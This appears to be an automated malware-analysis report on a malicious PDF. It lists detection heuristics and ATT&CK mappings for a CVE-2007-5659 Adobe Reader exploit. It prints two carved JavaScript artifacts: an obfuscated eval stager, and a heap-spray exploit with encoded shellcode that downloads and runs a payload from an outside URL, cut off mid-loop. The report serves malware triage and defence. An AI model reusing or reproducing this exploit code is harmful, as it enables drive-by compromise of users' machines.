Verdict: MALICIOUS
Risk Score: 358

Malware Insights
MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
The PDF file contains embedded JavaScript that exploits CVE-2007-5659 using the Collab.collectEmailInfo method. This script is designed to download and execute a second-stage payload from the URL http://gaboyaigfds.com/nte/goldmn.asp/yH0dbf0f11V0100f060006R98253d4d102Tc7aefd19203l000c. The exploit targets specific versions of Adobe Reader, indicating a targeted attack.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (10)
- Collab.collectEmailInfo — CVE-2007-5659 | severity: critical | CVE match: exact | rule: CVE_2007_5659
  PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
- JavaScript action | severity: low | 4 related findings | rule: PDF_JAVASCRIPT
  PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) | severity: high | CVE match: likely | rule: PDF_JS_ADOBE_APSB08_13_PATCH_GATE
  PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
- PDF JavaScript exploit cluster | severity: critical | rule: PDF_JS_EXPLOIT_CLUSTER
  PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- PDF JavaScript shellcode contains an embedded download URL | severity: high | rule: PDF_JS_SHELLCODE_DOWNLOAD_URL
  Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream | severity: low | rule: PDF_JS
  PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- ClamAV: Pdf.Exploit.Agent-36088 | severity: critical | rule: CLAMAV_DETECTION
  ClamAV detected this file as malware: Pdf.Exploit.Agent-36088
- Annotation subject callee-key hex JavaScript stager | severity: high | rule: PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
  PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
- Suspicious extracted artifact | severity: info | rule: EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL | severity: info | rule: EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://gaboyaigfds.com/nte/goldmn.asp/yH0dbf0f11V0100f060006R98253d4d102Tc7aefd19203l000c (referenced by PDF JavaScript)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Hash | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0007_000.js | 9fd87306e37a04c361ea1b68a1cf4474b7a018e2270929a8c382cd129d8fc406 | pdf-javascript-stream | PDF /JS object 7 at offset 0x19C | 566 bytes |
| annotation_subject_callee_hex_stage_000.js | 8108b1abdf8e256a0227a3e7a174764514a4dcad69c6ea84098d41de9ac8cb1a | deobfuscated-js | annotation-subject callee-key decoded JavaScript at offset 0x14A | 5137 bytes |

Artifact 1: javascript_obj0007_000.js

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):

```javascript
function dskp(s) {s = s.split('%'); r = ''; for (c in s) {if (!s[c]) continue; r += String.fromCharCode(parseInt(s[c], 16));} return r;}vd = ''; vnt = event; r = (r = 'l' + vd + 'a' + 'ce', 'rep' + r); if (!vd && r) {var z; tis = vnt['tar' + vd + 'get'];var e = vd + 'v' + 'a'; e = vd + 'e' + e; e = tis[e + 'l']; var y; z = y = tis;
y = 0; sas = 'sync'; sas += 'An' + vd + 'notS' + 'can'; z[sas] ( ); y = z;sbj = 'su' + 'bject';var p = y['g'+'et'+'Azots'[r](/z/, 'nn')]() ;var s = p[0][sbj];var l = s[r](/[FAE]/g, 'q%p'[r](/[qp]/g, ''));s = dskp (l) ;e(s);}
```

Artifact 2: annotation_subject_callee_hex_stage_000.js

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 5 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):

```javascript
var U18_W_3 = new Array();var k8_2EDT8se = 0;var P_0rTk0k = "";function X_3U0HiM(A_rOae, Lxv76_6WEl){var yi_1KR_c0 = Lxv76_6WEl.toString();var A0ELMy_3Kcbi5e = "";for(var y2OnxF_EX8wpF5w = 0; y2OnxF_EX8wpF5w < yi_1KR_c0.length; y2OnxF_EX8wpF5w++) {var q_V4__w1 = parseInt(yi_1KR_c0.substr(y2OnxF_EX8wpF5w, 1));if (!isNaN(q_V4__w1)) {q_V4__w1 = q_V4__w1.toString(16);if (q_V4__w1.length == 1) { q_V4__w1 = "0" + q_V4__w1; }else if (q_V4__w1.length != 2) { q_V4__w1 = "00"; }A0ELMy_3Kcbi5e = q_V4__w1 + A0ELMy_3Kcbi5e;}}while(A0ELMy_3Kcbi5e.length < 8) { A0ELMy_3Kcbi5e = "0" + A0ELMy_3Kcbi5e; }var x_o_xs__oBv = A_rOae.toString(16);if (x_o_xs__oBv.length == 1) { x_o_xs__oBv = "0" + x_o_xs__oBv; }else if (x_o_xs__oBv.length != 2) { x_o_xs__oBv = "00"; }A0ELMy_3Kcbi5e = "3" + x_o_xs__oBv + "P" + A0ELMy_3Kcbi5e;return A0ELMy_3Kcbi5e;}function B5C__x_UDX8(f_U_cFl1, Db30xF3){var jAlo___h3iaV = new Array("");var iX5_xhu = f_U_cFl1;var Kv5Q_t_2T;if ((Kv5Q_t_2T = f_U_cFl1.lastIndexOf("%u00")) != -1) {if (Kv5Q_t_2T + 6 == f_U_cFl1.length) {jAlo___h3iaV[0] = f_U_cFl1.substr(Kv5Q_t_2T + 4, 2);iX5_xhu = f_U_cFl1.substring(0, Kv5Q_t_2T);}}Kv5Q_t_2T = 1;for (y2OnxF_EX8wpF5w = 0; y2OnxF_EX8wpF5w < Db30xF3.length; y2OnxF_EX8wpF5w++) {var t6g_d0G6 = Db30xF3.charCodeAt(y2OnxF_EX8wpF5w).toString(16);if (t6g_d0G6.length == 1) { t6g_d0G6 = "0" + t6g_d0G6; }jAlo___h3iaV[Kv5Q_t_2T] = t6g_d0G6;Kv5Q_t_2T++;}y2OnxF_EX8wpF5w = jAlo___h3iaV[0].length ? 
0 : 1;jAlo___h3iaV[Kv5Q_t_2T] = "00";jAlo___h3iaV[Kv5Q_t_2T + 1] = "00";Kv5Q_t_2T += 2;if ((jAlo___h3iaV.length - y2OnxF_EX8wpF5w) % 2) {jAlo___h3iaV[Kv5Q_t_2T] = "00";}while(y2OnxF_EX8wpF5w < jAlo___h3iaV.length) {iX5_xhu += "%u" + jAlo___h3iaV[y2OnxF_EX8wpF5w + 1] + jAlo___h3iaV[y2OnxF_EX8wpF5w];y2OnxF_EX8wpF5w += 2;}iX5_xhu += "%u0000";return iX5_xhu;}function T_dCb3QKv2qb(EM_04_WRXK, duA_t3){while (EM_04_WRXK.length*2<duA_t3) {EM_04_WRXK += EM_04_WRXK;}EM_04_WRXK = EM_04_WRXK.substring(0,duA_t3/2);return EM_04_WRXK;}function UCy_a8ov(Gubi5nf, se4__p, H8e2__p53){var oxx_H_G__3 = 0x0c0c0c0c;var EM_04_WRXK = unescape(se4__p);var Db30xF3 = X_3U0HiM(Gubi5nf, H8e2__p53);var W__eS_h0_cb_G_J = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var f_U_cFl1 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u36e9%u0001%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u056a%ue859%u00ca%u0000%uf9e2%u00e8%u0000%u5800%u6a50%u6840%u00ff%u0000%u8350%u19c0%u5550%uec8b%u5e8b%u8310%u05c3%ue3ff%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0096%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u10ec%u0001%u8b00%u83dc%u0cc3%u5251%u6853%u0104%u0000%u56ff%u5a0c%u5159%u8b52%u5302%u8043%u003b%ufa75%u7b81%u2efc%u6c64%u756c%u8303%u08eb%u0389%u43c7%u2e04%u6c64%uc66c%u0843%u5b00%uc18a%u3004%u4588%u3300%u50c0%u5350%u5057%u56ff%u8314%u00f8%u1d75%u016a%ueb83%uc70c%u7203%u6765%uc773%u0443%u7276%u3233%u43c7%u2008%u732d%u5320%u56ff%u5a04%u8359%u04c2%u8041%u003a%u9090%u7590%uff9a%u0856%u5651%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uabc5%u595e%ue8c3%ufec5%uffff%u4e8e%uec0e%ufe98%u0e8a%ud87e%u73e2%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7175%u7976%u6800%u7474%u3a70%u2f2f%u6167%u6f62%u6179%u6769%u6466%u2e73%u6f63%u2f6d%u746e%u2f65%u6f67%u646c%u6e6d%u612e%u7073%u792f%u3048%u6264%u3066%u3166%u5631%u3130%u3030%u3066%u3036%u3030%u5236%u3839%u3532%u6433%u6434%u3031%u5432%u3763%u6561%u6466%u3931%u3032%u6c33%u3030%u6330";app.B_LO10G = unescape(B5C__x_UDX8(f_U_cFl1, Db30xF3));var b_2_je_4K1A8B8 = 0x400000;var fB6_W3JAees = W__eS_h0_cb_G_J.length * 2;var duA_t3 = b_2_je_4K1A8B8 - (fB6_W3JAees+0x38);EM_04_WRXK = T_dCb3QKv2qb(EM_04_WRXK, duA_t3);var g7ryrOFF = (oxx_H_G__3 - 0x400000)/b_2_je_4K1A8B8;for (var f8k__0Wa_2 = 0; f8k__0Wa_2 < g7ryrOFF; f8k__0Wa_2++) {U18_W_3[f8k__0Wa_2]
```

... (truncated)